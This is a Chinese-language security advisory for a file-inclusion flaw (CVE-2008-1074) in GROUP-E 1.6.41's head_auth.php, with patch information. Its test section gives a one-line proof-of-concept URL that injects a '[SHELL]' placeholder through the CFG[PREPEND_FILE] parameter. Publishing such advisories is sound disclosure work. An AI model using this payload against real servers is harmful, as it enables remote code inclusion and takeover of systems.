发布日期：2008-02-27
更新日期：2008-03-05

受影响系统：

GROUP-E GROUP-E 1.6.41

不受影响系统：

GROUP-E GROUP-E 1.6.42-SECURITY-UPDATE

描述：

---

BUGTRAQ  ID: 28024
CVE(CAN) ID: CVE-2008-1074

GROUP-E是基于LAMP架构的企业协作软件。

GROUP-E的www/lib/head_auth.php文件中没有正确地验证对CFG[PREPEND_FILE]参数的输入，这允许攻击者包含任意本地或外部资源的文件。成功攻击要求打开了register_globals。

<*来源：CraCkEr
  
  链接：http://secunia.com/advisories/29134/
        http://milw0rm.com/exploits/5197
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://localhost/path/www/lib/head_auth.php?CFG[PREPEND_FILE]=[SHELL]

建议：

---

厂商补丁：

GROUP-E
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sourceforge.net/project/showfiles.php?group_id=196032

浏览次数：2504
严重程度：0（网友投票）